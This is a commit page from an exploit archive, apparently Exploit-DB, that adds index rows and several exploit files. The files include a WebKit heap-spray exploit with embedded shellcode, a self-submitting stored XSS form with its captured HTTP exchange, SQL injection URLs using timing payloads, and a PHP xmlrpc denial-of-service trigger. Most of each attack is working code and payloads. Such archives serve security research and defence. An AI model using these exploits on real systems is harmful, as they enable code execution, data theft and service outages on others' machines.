Skip to content

Commit f550d4c

Browse files
author
Offensive Security
committed
Updated 06_15_2014
1 parent 8c4a59c commit f550d4c

11 files changed

Lines changed: 366 additions & 0 deletions

File tree

files.csv

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -30398,3 +30398,13 @@ id,file,description,date,author,platform,type,port
3039830398
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
3039930399
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
3040030400
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
30401+
33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
30402+
33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0
30403+
33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0
30404+
33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0
30405+
33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0
30406+
33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 'db_create.php' Cross Site Scripting Vulnerability",2010-03-12,Liscker,php,webapps,0
30407+
33755,platforms/php/dos/33755.php,"PHP <= 5.3.2 xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
30408+
33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
30409+
33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
30410+
33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0

platforms/asp/webapps/33758.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/38719/info
2+
3+
Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/manager/textbox.asp?id='

platforms/linux/remote/33752.html

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/38689/info
2+
3+
WebKit is prone to a remote memory-corruption vulnerability; fixes are available.
4+
5+
Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
6+
7+
This issue was previously documented in BID 38671 (Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it.
8+
9+
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML>

platforms/php/dos/33755.php

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/38708/info
2+
3+
PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests.
4+
5+
Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library.
6+
7+
PHP 5.3.1 is vulnerable; other versions may also be affected.
8+
9+
<?php
10+
$req = '<?xml version="1.0"?>
11+
<methodCall>
12+
</methodCall>';
13+
$result = xmlrpc_decode_request( $req, $frop );
14+
?>

platforms/php/webapps/33748.txt

Lines changed: 273 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,273 @@
1+
source: http://www.securityfocus.com/bid/38657/info
2+
3+
AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
6+
7+
AneCMS 1.0 is vulnerable; other versions may also be affected.
8+
9+
=======================================================================
10+
11+
ANE CMS 1 Persistent XSS Vulnerability
12+
13+
=======================================================================
14+
15+
by
16+
17+
Pratul Agrawal
18+
19+
20+
21+
# Vulnerability found in- Admin module
22+
23+
# email Pratulag@yahoo.com
24+
25+
# company aksitservices
26+
27+
# Credit by Pratul Agrawal
28+
29+
# Software ANE CMS 1
30+
31+
# Category CMS / Portals
32+
33+
# Plateform php
34+
35+
36+
37+
# Proof of concept #
38+
39+
Targeted URL: http://server/acp/index.php?p=cfg&m=links
40+
41+
42+
In ADD LINKS Field provide the malicious script to store in the Database.
43+
44+
That is-
45+
46+
<html>
47+
48+
<body>
49+
50+
<form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">
51+
52+
<input type=hidden name="name" value=""><script>alert("XSS")</script>">
53+
54+
<input type=hidden name="link" value=""><script>alert("XSS")</script>">
55+
56+
<input type=hidden name="type" value="1">
57+
58+
<input type=hidden name="view" value="0">
59+
60+
</form>
61+
62+
<script>
63+
64+
document.XYZ.submit();
65+
66+
</script>
67+
68+
</body>
69+
70+
</html>
71+
72+
73+
=======================================================================
74+
Request -
75+
=======================================================================
76+
POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
77+
Host: server
78+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
79+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
80+
Accept-Language: en-us,en;q=0.5
81+
Accept-Encoding: gzip,deflate
82+
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
83+
Keep-Alive: 300
84+
Proxy-Connection: keep-alive
85+
Referer: http://server/acp/index.php?p=cfg&m=links
86+
Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
87+
Content-Type: application/x-www-form-urlencoded
88+
Content-Length: 41
89+
90+
name="><script>alert("XSS")</script>&link="><script>alert("XSS")</script>&type=1&view=0
91+
92+
=======================================================================
93+
=======================================================================
94+
Response-
95+
=======================================================================
96+
HTTP/1.1 200 OK
97+
Date: Thu, 11 Mar 2010 06:59:03 GMT
98+
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
99+
Expires: Thu, 19 Nov 1981 08:52:00 GMT
100+
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
101+
Pragma: no-cache
102+
Vary: Accept-Encoding
103+
Content-Type: text/html; charset: utf-8
104+
Content-Length: 7771
105+
106+
&#65279;&#65279;<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
107+
<html xmlns="http://www.w3.org/1999/xhtml">
108+
<head>
109+
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
110+
<title>Transdmin Light</title>
111+
112+
<!-- CSS -->
113+
<link href="./skins/aaa/css/transdmin.css" rel="stylesheet" type="text/css" media="screen" />
114+
<!--[if IE 6]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie6.css" /><![endif]-->
115+
<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie7.css" /><![endif]-->
116+
117+
<!-- JavaScripts-->
118+
<link rel="stylesheet" type="text/css" href="http://server/system/js/jquery.jgrowl.css" media="screen"/> <script type="text/javascript" src="http://server/system/js/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://server/system/js/jquery.jgrowl_minimized.js"></script>
119+
<style>div.jGrowl div.green {
120+
background-color: #00D400;
121+
color: navy;
122+
}</style>
123+
</head>
124+
125+
<body>
126+
127+
<div id="wrapper">
128+
<!-- h1 tag stays for the logo, you can use the a tag for linking the index page -->
129+
<h1><a href="#"><span>Administration</span></a></h1>
130+
131+
<!-- You can name the links with lowercase, they will be transformed to uppercase by CSS, we prefered to name them with uppercase to have the same effect with disabled stylesheet -->
132+
<ul id="mainNav">
133+
<li><a href="index.php">Dashboard</a></li>
134+
<li><a href="?p=cfg">Configuration</a></li>
135+
<li><a href="?p=tpl">Design</a></li>
136+
<li><a href="?p=mod">Modules</a></li>
137+
<li class="logout"><a href="#">Logout Admin</a></li>
138+
<li class="logout"><a href="../index.php">CMS</a></li>
139+
</ul>
140+
<!-- // #end mainNav -->
141+
142+
<div id="containerHolder">
143+
<div id="container">
144+
<div id="sidebar">
145+
146+
<ul class="sideNav">
147+
<li><a href="?p=cfg">Show Setting</a></li>
148+
<li><a href="?p=cfg&m=mod">Modify Setting</a></li>
149+
<li><a href="?p=cfg&m=links">Links Management</a></li>
150+
<li><a href="?p=cfg&m=reposerver">Repository Server</a></li>
151+
</ul>
152+
153+
</div>
154+
155+
<h2><a href="#">Configuration</a> � <a href="#" class="active">Links</a></h2>
156+
157+
<div id="main"><br>
158+
159+
<form action="?p=cfg&m=links&id=0" class="jNice" method="POST">
160+
161+
<h3>Aggiungi un nuovo Link</h3>
162+
<fieldset><p><label>Nome link:</label><input type="text" class="text-long" name="name" value=""/></p>
163+
<p><label>Nome link:</label><input type="text" class="text-long" name="link" value=""/></p>
164+
<p><label>Tipo Link:</label><input type="radio" name="type" value="1" checked>Barra Links <input type="radio" name="type" value="2">Menu Links</p>
165+
166+
<p><label>Accesso:</label>
167+
<select name="view">
168+
<option value="0">Visible only to guests</option>
169+
<option value="1">Visible to all</option>
170+
<option value="2">Visible only to members</option>
171+
<option value="3">Visible only to admins</option>
172+
</select>
173+
</p>
174+
175+
<input type="submit" value="Send" />
176+
</fieldset>
177+
</form>
178+
179+
<table cellpadding="0" cellspacing="0">
180+
<tr>
181+
<td>Name</td>
182+
<td>Link</td>
183+
184+
<td>Options</td>
185+
</tr>
186+
<tr><td colspan="4">Bar Links</td></tr>
187+
<tr class="odd">
188+
<td>Home</td>
189+
<td>index.php</td>
190+
191+
<td><a href="?p=cfg&m=links&a=modify&id=1">Modify</a> <a href="?p=cfg&m=links&a=delete&id=1">Delete</a> <a href="?p=cfg&m=links&a=move&type=down&id=1">Move Down</a></td>
192+
</tr>
193+
<tr class="odd">
194+
<td>Blog</td>
195+
<td>blog</td>
196+
197+
<td><a href="?p=cfg&m=links&a=modify&id=2">Modify</a> <a href="?p=cfg&m=links&a=delete&id=2">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=2">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=2">Move Down</a></td>
198+
</tr>
199+
<tr class="odd">
200+
<td>Registrati</td>
201+
<td>register</td>
202+
203+
<td><a href="?p=cfg&m=links&a=modify&id=4">Modify</a> <a href="?p=cfg&m=links&a=delete&id=4">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=4">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=4">Move Down</a></td>
204+
</tr>
205+
<tr class="odd">
206+
<td>ACP</td>
207+
<td>acp</td>
208+
209+
<td><a href="?p=cfg&m=links&a=modify&id=5">Modify</a> <a href="?p=cfg&m=links&a=delete&id=5">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=5">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=5">Move Down</a></td>
210+
</tr>
211+
<tr class="odd">
212+
<td>Widgets</td>
213+
<td>index.php?modifywidgets</td>
214+
215+
<td><a href="?p=cfg&m=links&a=modify&id=6">Modify</a> <a href="?p=cfg&m=links&a=delete&id=6">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=6">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=6">Move Down</a></td>
216+
</tr>
217+
<tr class="odd">
218+
<td>master</td>
219+
<td>master.asp</td>
220+
221+
<td><a href="?p=cfg&m=links&a=modify&id=38">Modify</a> <a href="?p=cfg&m=links&a=delete&id=38">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=38">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=38">Move Down</a></td>
222+
</tr>
223+
<tr class="odd">
224+
<td>"><script>alert("XSS")</script></td>
225+
<td>"><script>alert("XSS")</script></td>
226+
227+
<td><a href="?p=cfg&m=links&a=modify&id=39">Modify</a> <a href="?p=cfg&m=links&a=delete&id=39">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=39">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=39">Move Down</a></td>
228+
</tr>
229+
<tr><td colspan="4">Menu Links</td></tr>
230+
<tr class="odd">
231+
<td>home</td>
232+
<td>index.php</td>
233+
234+
<td><a href="?p=cfg&m=links&a=modify&id=14">Modify</a> <a href="?p=cfg&m=links&a=delete&id=14">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=14">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=14">Move Down</a></td>
235+
</tr>
236+
<tr class="odd">
237+
<td>Blog</td>
238+
<td>blog</td>
239+
240+
<td><a href="?p=cfg&m=links&a=modify&id=19">Modify</a> <a href="?p=cfg&m=links&a=delete&id=19">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=19">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=19">Move Down</a></td>
241+
</tr>
242+
</table>
243+
<br />
244+
</div>
245+
246+
247+
<!-- // #main -->
248+
249+
<div class="clear"></div>
250+
</div>
251+
<!-- // #container -->
252+
</div>
253+
<!-- // #containerHolder -->
254+
255+
<p id="footer">Feel free to use and customize it. <a href="http://server">Credit is appreciated.</a></p>
256+
</div>
257+
<!-- // #wrapper -->
258+
259+
<script type="text/javascript">
260+
$(function()
261+
{
262+
});</script>
263+
</body>
264+
</html>
265+
266+
267+
=======================================================================
268+
269+
270+
After completion Just Refres the page and the script get executed again and again.
271+
272+
273+
#If you have any questions, comments, or concerns, feel free to contact me.

platforms/php/webapps/33749.txt

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/38658/info
2+
3+
ARTIS ABTON CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
The following example URIs are available:
8+
9+
http://www.example.com/rus/details/�??+benchmark(10000,md5(now()))+�??/
10+
11+
http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-�??1/
12+
13+
http://www.example.com/rus/�??+benchmark(10000,md5(now()))+�??/

0 commit comments

Comments
 (0)